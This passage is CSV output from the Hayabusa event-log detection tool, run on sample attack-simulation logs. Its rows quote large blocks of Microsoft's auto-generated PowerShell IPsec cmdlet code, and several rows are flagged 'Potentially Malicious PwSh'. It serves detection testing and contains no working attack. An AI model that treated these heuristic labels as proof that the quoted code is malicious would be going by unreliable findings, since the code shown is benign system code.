'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 